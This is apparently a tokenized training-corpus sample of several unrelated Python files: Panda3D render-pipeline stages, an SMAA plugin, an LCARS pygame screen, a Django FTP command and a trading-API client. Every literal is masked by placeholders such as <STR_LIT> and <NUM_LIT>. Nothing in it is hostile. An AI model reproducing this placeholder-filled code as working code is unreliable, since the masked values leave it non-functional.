<NUM_LIT:1> ) <EOL> def pta_to_glsl_type ( self , pta_handle ) : <EOL> """<STR_LIT>""" <EOL> for pta_type , glsl_type in iteritems ( GroupedInputBlock . 
PTA_MAPPINGS ) : <EOL> if isinstance ( pta_handle , pta_type ) : <EOL> return glsl_type <EOL> self . error ( "<STR_LIT>" , pta_handle ) <EOL> def glsl_type_to_pta ( self , glsl_type ) : <EOL> """<STR_LIT>""" <EOL> for key , val in iteritems ( GroupedInputBlock . PTA_MAPPINGS ) : <EOL> if val == glsl_type : <EOL> return key <EOL> self . error ( "<STR_LIT>" , glsl_type ) <EOL> def bind_to ( self , target ) : <EOL> """<STR_LIT>""" <EOL> for pta_name , pta_handle in iteritems ( self . ptas ) : <EOL> if self . use_ubo : <EOL> target . set_shader_input ( self . name + "<STR_LIT>" + pta_name , pta_handle ) <EOL> else : <EOL> target . set_shader_input ( self . name + "<STR_LIT:.>" + pta_name , pta_handle ) <EOL> def update_input ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . ptas [ name ] [ <NUM_LIT:0> ] = value <EOL> def get_input ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . ptas [ name ] [ <NUM_LIT:0> ] <EOL> def generate_shader_code ( self ) : <EOL> """<STR_LIT>""" <EOL> content = "<STR_LIT>" <EOL> content += "<STR_LIT>" <EOL> content += "<STR_LIT>" <EOL> structs = { } <EOL> inputs = [ ] <EOL> for input_name , handle in iteritems ( self . ptas ) : <EOL> parts = input_name . split ( "<STR_LIT:.>" ) <EOL> if len ( parts ) == <NUM_LIT:1> : <EOL> inputs . append ( self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + input_name + "<STR_LIT:;>" ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> struct_name = parts [ <NUM_LIT:0> ] <EOL> actual_input_name = parts [ <NUM_LIT:1> ] <EOL> if struct_name in structs : <EOL> structs [ struct_name ] . append ( <EOL> self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + actual_input_name + "<STR_LIT:;>" ) <EOL> else : <EOL> inputs . append ( struct_name + "<STR_LIT>" + struct_name + "<STR_LIT:;>" ) <EOL> structs [ struct_name ] = [ <EOL> self . pta_to_glsl_type ( handle ) + "<STR_LIT:U+0020>" + actual_input_name + "<STR_LIT:;>" <EOL> ] <EOL> else : <EOL> self . 
warn ( "<STR_LIT>" , input_name ) <EOL> for struct_name , members in iteritems ( structs ) : <EOL> content += "<STR_LIT>" + struct_name + "<STR_LIT>" <EOL> for member in members : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + member + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" <EOL> if len ( inputs ) < <NUM_LIT:1> : <EOL> self . debug ( "<STR_LIT>" , self . name ) <EOL> else : <EOL> if self . use_ubo : <EOL> content += "<STR_LIT>" . format ( <EOL> self . bind_id , self . name ) <EOL> for ipt in inputs : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + ipt + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" + self . name + "<STR_LIT>" <EOL> else : <EOL> content += "<STR_LIT>" <EOL> for ipt in inputs : <EOL> content += "<STR_LIT:U+0020>" * <NUM_LIT:4> + ipt + "<STR_LIT:\n>" <EOL> content += "<STR_LIT>" + self . name + "<STR_LIT>" <EOL> content += "<STR_LIT:\n>" <EOL> return content </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from rplibs . six . moves import range <EOL> from rplibs . six import itervalues <EOL> from panda3d . core import Camera , PerspectiveLens , Vec4 , Vec3 , PTAInt <EOL> from rpcore . globals import Globals <EOL> from rpcore . image import Image <EOL> from rpcore . render_stage import RenderStage <EOL> class EnvironmentCaptureStage ( RenderStage ) : <EOL> """<STR_LIT>""" <EOL> required_inputs = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> required_pipes = [ ] <EOL> def __init__ ( self , pipeline ) : <EOL> RenderStage . __init__ ( self , pipeline ) <EOL> self . resolution = <NUM_LIT> <EOL> self . diffuse_resolution = <NUM_LIT:4> <EOL> self . regions = [ ] <EOL> self . cameras = [ ] <EOL> self . rig_node = Globals . render . attach_new_node ( "<STR_LIT>" ) <EOL> self . pta_index = PTAInt . empty_array ( <NUM_LIT:1> ) <EOL> self . storage_tex = None <EOL> self . storage_tex_diffuse = None <EOL> def create ( self ) : <EOL> self . target = self . create_target ( "<STR_LIT>" ) <EOL> self . target . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target . add_depth_attachment ( bits = <NUM_LIT:16> ) <EOL> self . target . add_color_attachment ( bits = <NUM_LIT:16> , alpha = True ) <EOL> self . target . prepare_render ( None ) <EOL> internal_buffer = self . target . internal_buffer <EOL> internal_buffer . remove_all_display_regions ( ) <EOL> internal_buffer . disable_clears ( ) <EOL> internal_buffer . get_overlay_display_region ( ) . disable_clears ( ) <EOL> self . _setup_camera_rig ( ) <EOL> self . _create_store_targets ( ) <EOL> self . 
_create_filter_targets ( ) <EOL> def _setup_camera_rig ( self ) : <EOL> """<STR_LIT>""" <EOL> directions = ( Vec3 ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , Vec3 ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> Vec3 ( <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:0> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , Vec3 ( <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ) ) <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> region = self . target . internal_buffer . make_display_region ( <EOL> i / <NUM_LIT:6> , i / <NUM_LIT:6> + <NUM_LIT:1> / <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> region . set_sort ( <NUM_LIT> + i ) <EOL> region . set_active ( True ) <EOL> region . disable_clears ( ) <EOL> region . set_clear_depth_active ( True ) <EOL> region . set_clear_depth ( <NUM_LIT:1.0> ) <EOL> region . set_clear_color_active ( True ) <EOL> region . set_clear_color ( Vec4 ( <NUM_LIT:0> ) ) <EOL> lens = PerspectiveLens ( ) <EOL> lens . set_fov ( <NUM_LIT> ) <EOL> lens . set_near_far ( <NUM_LIT> , <NUM_LIT:1.0> ) <EOL> camera = Camera ( "<STR_LIT>" + str ( i ) , lens ) <EOL> camera_np = self . rig_node . attach_new_node ( camera ) <EOL> camera_np . look_at ( camera_np , directions [ i ] ) <EOL> region . set_camera ( camera_np ) <EOL> self . regions . append ( region ) <EOL> self . cameras . append ( camera_np ) <EOL> self . cameras [ <NUM_LIT:0> ] . set_r ( <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:1> ] . set_r ( - <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:3> ] . set_r ( <NUM_LIT> ) <EOL> self . cameras [ <NUM_LIT:5> ] . set_r ( <NUM_LIT> ) <EOL> for camera_np in self . cameras : <EOL> self . _pipeline . tag_mgr . register_camera ( "<STR_LIT>" , camera_np . node ( ) ) <EOL> def _create_store_targets ( self ) : <EOL> """<STR_LIT>""" <EOL> self . target_store = self . create_target ( "<STR_LIT>" ) <EOL> self . target_store . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target_store . 
prepare_buffer ( ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . target . color_tex ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . storage_tex ) <EOL> self . target_store . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> self . temporary_diffuse_map = Image . create_cube ( "<STR_LIT>" , self . resolution , "<STR_LIT>" ) <EOL> self . target_store_diff = self . create_target ( "<STR_LIT>" ) <EOL> self . target_store_diff . size = self . resolution * <NUM_LIT:6> , self . resolution <EOL> self . target_store_diff . prepare_buffer ( ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . target . color_tex ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . temporary_diffuse_map ) <EOL> self . target_store_diff . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> def _create_filter_targets ( self ) : <EOL> """<STR_LIT>""" <EOL> self . filter_targets = [ ] <EOL> mip = <NUM_LIT:0> <EOL> size = self . resolution <EOL> while size > <NUM_LIT:1> : <EOL> size = size // <NUM_LIT:2> <EOL> mip += <NUM_LIT:1> <EOL> target = self . create_target ( "<STR_LIT>" . format ( mip , size ) ) <EOL> target . size = size * <NUM_LIT:6> , size <EOL> target . prepare_buffer ( ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> target . set_shader_input ( "<STR_LIT>" , mip ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . storage_tex ) <EOL> target . set_shader_input ( "<STR_LIT>" , self . storage_tex , False , True , - <NUM_LIT:1> , mip , <NUM_LIT:0> ) <EOL> self . filter_targets . append ( target ) <EOL> self . filter_diffuse_target = self . create_target ( "<STR_LIT>" ) <EOL> self . filter_diffuse_target . size = self . diffuse_resolution * <NUM_LIT:6> , self . diffuse_resolution <EOL> self . filter_diffuse_target . prepare_buffer ( ) <EOL> self . filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . temporary_diffuse_map ) <EOL> self . 
filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . storage_tex_diffuse ) <EOL> self . filter_diffuse_target . set_shader_input ( "<STR_LIT>" , self . pta_index ) <EOL> def set_probe ( self , probe ) : <EOL> self . rig_node . set_mat ( probe . matrix ) <EOL> self . pta_index [ <NUM_LIT:0> ] = probe . index <EOL> def update ( self ) : <EOL> for target in itervalues ( self . _targets ) : <EOL> target . active = False <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> if self . _pipeline . task_scheduler . is_scheduled ( "<STR_LIT>" + str ( i ) ) : <EOL> self . regions [ i ] . set_active ( True ) <EOL> if self . _pipeline . task_scheduler . is_scheduled ( "<STR_LIT>" ) : <EOL> self . target_store . active = True <EOL> self . target_store_diff . active = True <EOL> self . filter_diffuse_target . active = True <EOL> for target in self . filter_targets : <EOL> target . active = True <EOL> def set_shader_input ( self , * args ) : <EOL> Globals . render . set_shader_input ( * args ) <EOL> def reload_shaders ( self ) : <EOL> self . target_store . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> self . target_store_diff . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> self . filter_diffuse_target . shader = self . load_plugin_shader ( <EOL> "<STR_LIT>" ) <EOL> for i , target in enumerate ( self . filter_targets ) : <EOL> target . shader = self . load_plugin_shader ( "<STR_LIT>" . format ( i ) ) </s>
<s> """<STR_LIT>""" <EOL> from panda3d . core import SamplerState <EOL> from rpcore . globals import Globals <EOL> from rpcore . loader import RPLoader <EOL> from rpcore . pluginbase . base_plugin import BasePlugin <EOL> from . smaa_stage import SMAAStage <EOL> from . jitters import JITTERS <EOL> class Plugin ( BasePlugin ) : <EOL> name = "<STR_LIT>" <EOL> author = "<STR_LIT>" <EOL> description = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> version = "<STR_LIT>" <EOL> def on_stage_setup ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> self . _compute_jitters ( ) <EOL> self . _smaa_stage = self . create_stage ( SMAAStage ) <EOL> self . _smaa_stage . use_reprojection = self . get_setting ( "<STR_LIT>" ) <EOL> self . _load_textures ( ) <EOL> def on_pre_render_update ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> jitter_scale = self . get_setting ( "<STR_LIT>" ) <EOL> jitter = self . _jitters [ self . _jitter_index ] <EOL> jitter = jitter [ <NUM_LIT:0> ] * jitter_scale , jitter [ <NUM_LIT:1> ] * jitter_scale <EOL> Globals . base . camLens . set_film_offset ( jitter ) <EOL> self . _smaa_stage . set_jitter_index ( self . _jitter_index ) <EOL> self . _jitter_index += <NUM_LIT:1> <EOL> if self . _jitter_index >= len ( self . _jitters ) : <EOL> self . _jitter_index = <NUM_LIT:0> <EOL> def _compute_jitters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _jitters = [ ] <EOL> self . _jitter_index = <NUM_LIT:0> <EOL> scale = <NUM_LIT:1.0> / float ( Globals . native_resolution . x ) <EOL> for x , y in JITTERS [ self . get_setting ( "<STR_LIT>" ) ] : <EOL> jitter_x = ( x * <NUM_LIT:2> - <NUM_LIT:1> ) * scale * <NUM_LIT:0.5> <EOL> jitter_y = ( y * <NUM_LIT:2> - <NUM_LIT:1> ) * scale * <NUM_LIT:0.5> <EOL> self . _jitters . append ( ( jitter_x , jitter_y ) ) <EOL> @ property <EOL> def history_length ( self ) : <EOL> if self . get_setting ( "<STR_LIT>" ) : <EOL> return len ( self . 
_jitters ) <EOL> return <NUM_LIT:1> <EOL> def update_jitter_pattern ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _compute_jitters ( ) <EOL> def _load_textures ( self ) : <EOL> """<STR_LIT>""" <EOL> search_tex = RPLoader . load_texture ( self . get_resource ( "<STR_LIT>" ) ) <EOL> area_tex = RPLoader . load_texture ( self . get_resource ( "<STR_LIT>" ) ) <EOL> for tex in [ search_tex , area_tex ] : <EOL> tex . set_minfilter ( SamplerState . FT_linear ) <EOL> tex . set_magfilter ( SamplerState . FT_linear ) <EOL> tex . set_wrap_u ( SamplerState . WM_clamp ) <EOL> tex . set_wrap_v ( SamplerState . WM_clamp ) <EOL> self . _smaa_stage . area_tex = area_tex <EOL> self . _smaa_stage . search_tex = search_tex </s>
<s> """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import os <EOL> import sys <EOL> from os . path import dirname , realpath , isfile <EOL> files_to_ignore = "<STR_LIT>" . split ( ) <EOL> current_dir = dirname ( realpath ( __file__ ) ) <EOL> os . chdir ( current_dir ) <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> sys . path . insert ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> from submodule_downloader import download_submodule <EOL> download_submodule ( "<STR_LIT>" , "<STR_LIT>" , current_dir , files_to_ignore ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as handle : <EOL> handle . write ( "<STR_LIT>" ) <EOL> if isfile ( "<STR_LIT>" ) : <EOL> os . remove ( "<STR_LIT>" ) <EOL> os . rename ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> from datetime import datetime <EOL> import pygame <EOL> from pygame . mixer import Sound <EOL> from ui import colours <EOL> from ui . widgets . background import LcarsBackgroundImage , LcarsImage <EOL> from ui . widgets . gifimage import LcarsGifImage <EOL> from ui . widgets . lcars_widgets import LcarsText , LcarsButton <EOL> from ui . widgets . screen import LcarsScreen <EOL> from ui . widgets . sprite import LcarsMoveToMouse <EOL> class ScreenMain ( LcarsScreen ) : <EOL> def setup ( self , all_sprites ) : <EOL> all_sprites . add ( LcarsBackgroundImage ( "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:0> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT:11> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . ORANGE , ( <NUM_LIT:0> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT:2> ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . BLACK , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" ) , <EOL> layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsText ( colours . WHITE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> all_sprites . add ( LcarsText ( colours . BLUE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) , <EOL> layer = <NUM_LIT:3> ) <EOL> self . info_text = all_sprites . 
get_sprites_from_layer ( <NUM_LIT:3> ) <EOL> self . stardate = LcarsText ( colours . BLUE , ( <NUM_LIT:12> , <NUM_LIT> ) , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . lastClockUpdate = <NUM_LIT:0> <EOL> all_sprites . add ( self . stardate , layer = <NUM_LIT:1> ) <EOL> all_sprites . add ( LcarsButton ( colours . RED_BROWN , ( <NUM_LIT:6> , <NUM_LIT> ) , "<STR_LIT>" , self . logoutHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . BEIGE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . sensorsHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . PURPLE , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . gaugesHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsButton ( colours . PEACH , ( <NUM_LIT> , <NUM_LIT> ) , "<STR_LIT>" , self . weatherHandler ) , <EOL> layer = <NUM_LIT:4> ) <EOL> all_sprites . add ( LcarsGifImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT:100> ) , layer = <NUM_LIT:1> ) <EOL> self . sensor_gadget = LcarsGifImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT:100> ) <EOL> self . sensor_gadget . visible = False <EOL> all_sprites . add ( self . sensor_gadget , layer = <NUM_LIT:2> ) <EOL> self . dashboard = LcarsImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . dashboard . visible = False <EOL> all_sprites . add ( self . dashboard , layer = <NUM_LIT:2> ) <EOL> self . weather = LcarsImage ( "<STR_LIT>" , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . weather . visible = False <EOL> all_sprites . add ( self . weather , layer = <NUM_LIT:2> ) <EOL> self . beep1 = Sound ( "<STR_LIT>" ) <EOL> Sound ( "<STR_LIT>" ) . play ( ) <EOL> def update ( self , screenSurface , fpsClock ) : <EOL> if pygame . time . get_ticks ( ) - self . lastClockUpdate > <NUM_LIT:1000> : <EOL> self . stardate . setText ( "<STR_LIT>" . format ( datetime . now ( ) . strftime ( "<STR_LIT>" ) ) ) <EOL> self . lastClockUpdate = pygame . time . get_ticks ( ) <EOL> LcarsScreen . 
update ( self , screenSurface , fpsClock ) <EOL> def handleEvents ( self , event , fpsClock ) : <EOL> LcarsScreen . handleEvents ( self , event , fpsClock ) <EOL> if event . type == pygame . MOUSEBUTTONDOWN : <EOL> self . beep1 . play ( ) <EOL> if event . type == pygame . MOUSEBUTTONUP : <EOL> return False <EOL> def hideInfoText ( self ) : <EOL> if self . info_text [ <NUM_LIT:0> ] . visible : <EOL> for sprite in self . info_text : <EOL> sprite . visible = False <EOL> def gaugesHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = False <EOL> self . dashboard . visible = True <EOL> self . weather . visible = False <EOL> def sensorsHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = True <EOL> self . dashboard . visible = False <EOL> self . weather . visible = False <EOL> def weatherHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = False <EOL> self . dashboard . visible = False <EOL> self . weather . visible = True <EOL> def logoutHandler ( self , item , event , clock ) : <EOL> from screens . authorize import ScreenAuthorize <EOL> self . loadScreen ( ScreenAuthorize ( ) ) </s>
<s> from . main import main <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import sys <EOL> from optparse import make_option <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from django_ftpserver import models <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , ) <EOL> args = "<STR_LIT>" <EOL> def handle ( self , * args , ** options ) : <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> name = args [ <NUM_LIT:0> ] <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> home_dir = args [ <NUM_LIT:1> ] <EOL> else : <EOL> home_dir = None <EOL> if models . FTPUserGroup . objects . filter ( name = name ) . exists ( ) : <EOL> raise CommandError ( <EOL> "<STR_LIT>" . format ( name = name ) ) <EOL> group = models . FTPUserGroup ( name = name , home_dir = home_dir ) <EOL> if options [ '<STR_LIT>' ] : <EOL> group . permission = options [ '<STR_LIT>' ] <EOL> group . save ( ) <EOL> sys . stdout . write ( <EOL> "<STR_LIT>" . format ( <EOL> pk = group . pk , name = name ) ) </s>
<s> import json <EOL> import requests <EOL> from io import BytesIO <EOL> from time import sleep , time <EOL> from zipfile import ZipFile , BadZipfile <EOL> from logging import getLogger <EOL> from requests . exceptions import RequestException <EOL> try : <EOL> from types import NoneType <EOL> except ImportError : <EOL> NoneType = type ( None ) <EOL> from . exceptions import BadCredentials , BadRequest <EOL> log = getLogger ( __name__ ) <EOL> class Client ( object ) : <EOL> API_VERSION = "<STR_LIT>" <EOL> def __init__ ( <EOL> self , <EOL> environment , <EOL> account_id = None , <EOL> access_token = None , <EOL> json_options = None <EOL> ) : <EOL> self . domain , self . domain_stream = environment <EOL> self . access_token = access_token <EOL> self . account_id = account_id <EOL> self . json_options = json_options or { } <EOL> if account_id and not self . get_credentials ( ) : <EOL> raise BadCredentials ( ) <EOL> def get_credentials ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> response = self . _Client__call ( uri = url ) <EOL> assert len ( response ) > <NUM_LIT:0> <EOL> return response <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def __get_response ( self , uri , params = None , method = "<STR_LIT>" , stream = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) or not self . session : <EOL> self . session = requests . Session ( ) <EOL> if self . access_token : <EOL> self . session . headers . update ( <EOL> { '<STR_LIT>' : '<STR_LIT>' . format ( self . access_token ) } <EOL> ) <EOL> if params : <EOL> params = { k : v for k , v in params . 
items ( ) if v is not None } <EOL> kwargs = { <EOL> "<STR_LIT:url>" : uri , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : stream <EOL> } <EOL> kwargs [ "<STR_LIT>" if method == "<STR_LIT>" else "<STR_LIT:data>" ] = params <EOL> return getattr ( self . session , method ) ( ** kwargs ) <EOL> def __call ( self , uri , params = None , method = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resp = self . __get_response ( uri , params , method , False ) <EOL> rjson = resp . json ( ** self . json_options ) <EOL> assert resp . ok <EOL> except AssertionError : <EOL> msg = "<STR_LIT>" . format ( resp . status_code , rjson [ "<STR_LIT:message>" ] ) <EOL> raise BadRequest ( msg ) <EOL> except Exception as e : <EOL> msg = "<STR_LIT>" . format ( e ) <EOL> log . error ( msg , exc_info = True ) <EOL> raise BadRequest ( msg ) <EOL> else : <EOL> return rjson <EOL> def __call_stream ( self , uri , params = None , method = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resp = self . __get_response ( uri , params , method , True ) <EOL> assert resp . ok <EOL> except AssertionError : <EOL> raise BadRequest ( resp . status_code ) <EOL> except Exception as e : <EOL> log . error ( "<STR_LIT>" . format ( e ) , exc_info = True ) <EOL> else : <EOL> return resp <EOL> def get_instruments ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT>" : self . account_id } <EOL> try : <EOL> response = self . _Client__call ( uri = url , params = params ) <EOL> assert len ( response ) > <NUM_LIT:0> <EOL> return response <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_prices ( self , instruments , stream = True ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain_stream if stream else self . domain , <EOL> self . API_VERSION <EOL> ) <EOL> params = { "<STR_LIT>" : self . 
account_id , "<STR_LIT>" : instruments } <EOL> call = { "<STR_LIT>" : url , "<STR_LIT>" : params , "<STR_LIT>" : "<STR_LIT>" } <EOL> try : <EOL> if stream : <EOL> return self . _Client__call_stream ( ** call ) <EOL> else : <EOL> return self . _Client__call ( ** call ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_instrument_history ( self , instrument , candle_format = "<STR_LIT>" , <EOL> granularity = '<STR_LIT>' , count = <NUM_LIT> , <EOL> daily_alignment = None , alignment_timezone = None , <EOL> weekly_alignment = "<STR_LIT>" , start = None , <EOL> end = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { <EOL> "<STR_LIT>" : self . account_id , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : candle_format , <EOL> "<STR_LIT>" : granularity , <EOL> "<STR_LIT:count>" : count , <EOL> "<STR_LIT>" : daily_alignment , <EOL> "<STR_LIT>" : alignment_timezone , <EOL> "<STR_LIT>" : weekly_alignment , <EOL> "<STR_LIT:start>" : start , <EOL> "<STR_LIT:end>" : end , <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_orders ( self , instrument = None , count = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { "<STR_LIT>" : instrument , "<STR_LIT:count>" : count } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_order ( self , order_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . 
account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def create_order ( self , order ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( <EOL> uri = url , <EOL> params = order . __dict__ , <EOL> method = "<STR_LIT>" <EOL> ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def update_order ( self , order_id , order ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( <EOL> uri = url , <EOL> params = order . __dict__ , <EOL> method = "<STR_LIT>" <EOL> ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def close_order ( self , order_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_trades ( self , max_id = None , count = None , instrument = None , ids = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : int ( max_id ) if max_id and max_id > <NUM_LIT:0> else None , <EOL> "<STR_LIT:count>" : int ( count ) if count and count > <NUM_LIT:0> else None , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : '<STR_LIT:U+002C>' . 
